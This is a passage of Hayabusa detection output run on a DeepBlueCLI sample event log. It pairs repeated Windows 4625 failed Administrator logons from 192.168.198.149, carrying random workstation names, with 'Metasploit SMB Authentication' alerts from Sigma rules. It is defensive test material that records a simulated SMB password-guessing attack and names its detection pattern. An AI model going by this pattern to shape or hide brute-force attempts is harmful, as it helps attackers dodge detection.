Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 